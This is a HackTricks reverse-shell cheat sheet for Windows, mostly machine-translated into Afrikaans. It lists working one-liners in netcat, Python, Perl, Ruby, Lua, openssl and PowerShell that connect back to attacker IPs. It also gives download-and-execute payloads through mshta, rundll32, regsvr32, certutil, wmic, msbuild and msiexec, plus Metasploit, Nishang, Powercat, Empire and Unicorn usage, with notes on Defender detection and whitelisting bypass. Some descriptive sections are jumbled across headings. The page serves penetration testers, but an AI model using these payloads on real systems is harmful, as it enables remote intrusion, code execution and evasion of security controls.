hacktricks/generic-methodologies-and-resources/shells/windows.md

24 KiB
Raw Blame History

Skulpe - Windows

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Probeer Hard Security Group

{% embed url="https://discord.gg/tryhardsecurity" %}


Lolbas

Die bladsy lolbas-project.github.io is vir Windows soos https://gtfobins.github.io/ is vir Linux.
Duidelik, daar is nie SUID-lêers of sudo-voorregte in Windows nie, maar dit is nuttig om te weet hoe sommige binêre lêers (mis)bruik kan word om sekere onverwagte aksies uit te voer soos die uitvoer van arbitrêre kode.

NC

nc.exe -e cmd.exe <Attacker_IP> <PORT>

SBD

sbd is 'n draagbare en veilige Netcat-alternatief. Dit werk op Unix-soortgelyke stelsels en Win32. Met kenmerke soos sterk enkripsie, program uitvoering, aanpasbare bronpoorte, en voortdurende herverbinding, bied sbd 'n veelsydige oplossing vir TCP/IP kommunikasie. Vir Windows-gebruikers kan die sbd.exe weergawe van die Kali Linux-verspreiding gebruik word as 'n betroubare vervanging vir Netcat.

# Victims machine
sbd -l -p 4444 -e bash -v -n
listening on port 4444


# Atackers
sbd 10.10.10.10 4444
id
uid=0(root) gid=0(root) groups=0(root)

Python

#Windows
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"

Perl

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby

Windows

Meterpreter

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

Web Delivery

The Web Delivery module is a unique way of delivering payloads through a web server. The module starts a web server that hosts a payload. When the target visits the server, the payload is executed on the target machine. This method is useful for delivering payloads in scenarios where the target is not directly accessible from the attacker's machine.

PowerShell

PowerShell is a task automation and configuration management framework from Microsoft, consisting of a command-line shell and associated scripting language. Metasploit has a wide range of PowerShell payloads that can be used to execute code on a target machine. These payloads are useful for scenarios where traditional methods may be detected by security solutions.

#Windows
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Lua

lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

OpenSSH

Aanvaller (Kali)

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response

Slachtoffer

Windows

Windows Command Prompt

Die Windows Command Prompt is 'n baie nuttige tool vir die uitvoering van verskeie take tydens 'n aanval. Dit kan gebruik word vir die uitvoering van opdragte, die navigasie deur die lêersisteem, die skep van nuwe lêers en nog baie meer.

PowerShell

PowerShell is 'n kragtige skripsie taal wat deur aanvallers gebruik kan word vir die uitvoering van gevorderde aanvaltegnieke. Dit bied 'n wye verskeidenheid van funksies en kan selfs gebruik word vir die skadelike uitvoering van kode.

Metasploit Meterpreter

Metasploit Meterpreter is 'n kragtige aanvalswerktuig wat deur Metasploit verskaf word. Dit bied 'n volledige omgewing vir die uitvoering van aanvaltegnieke op 'n slagoffer se stelsel. Metasploit Meterpreter bied 'n verskeidenheid van funksies soos lêerbestuur, prosesbeheer, en selfs die kap van webkameras.

#Linux
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

#Windows
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

Powershell

powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')"
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile

Proses wat netwerkoproep uitvoer: powershell.exe
Lading geskryf op skyf: GEEN (ten minste nêrens wat ek kon vind deur procmon te gebruik!)

powershell -exec bypass -f \\webdavserver\folder\payload.ps1

Proses wat netwerkoproep uitvoer: svchost.exe
Lading geskryf op skyf: WebDAV-klient plaaslike cache

$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Kry meer inligting oor verskillende Powershell-skulpe aan die einde van hierdie dokument

Mshta

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
mshta http://webserver/payload.hta
mshta \\webdavserver\folder\payload.hta

Voorbeeld van hta-psh omgekeerde skaal (gebruik hta om PS agterdeur af te laai en uit te voer)

<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>

Jy kan baie maklik 'n Koadic zombie aflaai en uitvoer deur die stager hta te gebruik

hta voorbeeld

Vanaf hier

<html>
<head>
<HTA:APPLICATION ID="HelloExample">
<script language="jscript">
var c = "cmd.exe /c calc.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>

mshta - sct

Van hier af

<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:C:\local\path\scriptlet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>

Mshta - Metasploit

use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit
Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit

Opgespoor deur verdediger

Rundll32

Dll hallo wêreld voorbeeld

rundll32 \\webdavserver\folder\payload.dll,entrypoint
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

Opgespoor deur verdediger

Rundll32 - sct

Van hier af

<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>

Rundll32 - Metasploit

use windows/smb/smb_delivery
run
#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0

Rundll32 - Koadic

use stager/js/rundll32_js
set SRVHOST 192.168.1.107
set ENDPOINT sales
run
#Koadic will tell you what you need to execute inside the victim, it will be something like:
rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();

Regsvr32

regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

Opgespoor deur verdediger

Regsvr32 -sct

Vanaf hier

<?XML version="1.0"?>
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
<!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll -->
<scriptlet>
<registration
progid="PoC"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>

Regsvr32 - Metasploit

use multi/script/web_delivery
set target 3
set payload windows/meterpreter/reverse/tcp
set lhost 10.2.0.5
run
#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll

Jy kan baie maklik 'n Koadic zombie aflaai en uitvoer deur die stager regsvr te gebruik

Certutil

Laai 'n B64dll af, ontsluit dit en voer dit uit.

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll

Laai 'n B64exe af, ontsluit dit en voer dit uit.

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe

Opgespoor deur verdediger

Cscript/Wscript

powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""

Cscript - Metasploit

msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs

Opgespoor deur verdediger

PS-Bat

\\webdavserver\folder\batchfile.bat

Proses wat netwerkoproep uitvoer: svchost.exe
Lading geskryf op skyf: WebDAV-klient plaaslike cache

msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat
impacket-smbserver -smb2support kali `pwd`
\\10.8.0.3\kali\shell.bat

Opgespoor deur verdediger

MSIExec

Aanvaller

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi
python -m SimpleHTTPServer 80

Slachtoffer:

victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi

Opgespoor

Wmic

wmic os get /format:"https://webserver/payload.xsl"

Voorbeeld xsl-lêer van hier:

<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString('http://10.2.0.5/shell.ps1') | powershell -noprofile -");
]]>
</ms:script>
</stylesheet>

Nie opgespoor nie

Jy kan baie maklik 'n Koadic zombie aflaai en uitvoer deur die stager wmic te gebruik

Msbuild

cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

Jy kan hierdie tegniek gebruik om Toepassingswitlysing en Powershell.exe-beperkings te omseil. Aangesien jy met 'n PS-skul gekonfronteer sal word.
Net aflaai en uitvoer: https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj

Nie opgespoor nie

CSC

Stel C#-kode saam op die slagoffer se masjien.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs

Jy kan 'n basiese C# omgekeerde dop van hier af aflaai: https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc

Nie opgespoor nie

Regasm/Regsvc

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

Ek het dit nie probeer nie

https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182

Odbcconf

odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

Ek het dit nie probeer nie

https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2

Powershell Skulpe

PS-Nishang

https://github.com/samratashok/nishang

In die Skulpe-vouer is daar baie verskillende skulpe. Om Invoke-PowerShellTcp.ps1 af te laai en uit te voer, maak 'n kopie van die skripsie en voeg dit aan die einde van die lêer by:

Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444

Begin deur die skrip in 'n webbediener te bedien en voer dit aan die slagoffer se kant uit:

powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"

Verdediger beskou dit nie as skadelike kode nie (nog nie, 3/04/2019).

TODO: Kontroleer ander nishang doppe

PS-Powercat

https://github.com/besimorhino/powercat

Laai af, begin 'n webbediener, begin die luisteraar, en voer dit aan die slagoffer se kant uit:

powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"

Defender ken dit nie as skadelike kode opspoor nie (nog nie, 3/04/2019).

Ander opsies wat deur powercat aangebied word:

Bind skulpe, Omgekeerde skulp (TCP, UDP, DNS), Poort omleiding, oplaai/aflaai, Genereer vragte, Bedien lêers...

Serve a cmd Shell:
powercat -l -p 443 -e cmd
Send a cmd Shell:
powercat -c 10.1.1.1 -p 443 -e cmd
Send a powershell:
powercat -c 10.1.1.1 -p 443 -ep
Send a powershell UDP:
powercat -c 10.1.1.1 -p 443 -ep -u
TCP Listener to TCP Client Relay:
powercat -l -p 8000 -r tcp:10.1.1.16:443
Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:
powercat -c 10.1.1.15 -p 443 -e cmd -g
Start A Persistent Server That Serves a File:
powercat -l -p 443 -i C:\inputfile -rep

Empire

https://github.com/EmpireProject/Empire

Skep 'n powershell-aanroeper, stoor dit in 'n lêer en laai dit af en voer dit uit.

powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"

Opgespoor as skadelike kode

MSF-Eenhoorn

https://github.com/trustedsec/unicorn

Skep 'n Powershell weergawe van Metasploit agterdeur deur Eenhoorn te gebruik

python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443

Begin msfconsole met die geskepte hulpbron:

msfconsole -r unicorn.rc

Begin 'n webbediener wat die powershell_attack.txt lêer bedien en voer in die slagoffer uit:

powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"

Opgespoor as skadelike kode

Meer

PS>Aanval PS-konsole met 'n paar aanvallende PS-modules vooraf gelaai (gekodeer)
https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9
WinPWN
PS-konsole met 'n paar aanvallende PS-modules en proksideteksie (IEX)

Verwysings

{% embed url="https://discord.gg/tryhardsecurity" %}

Leer AWS hak van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun: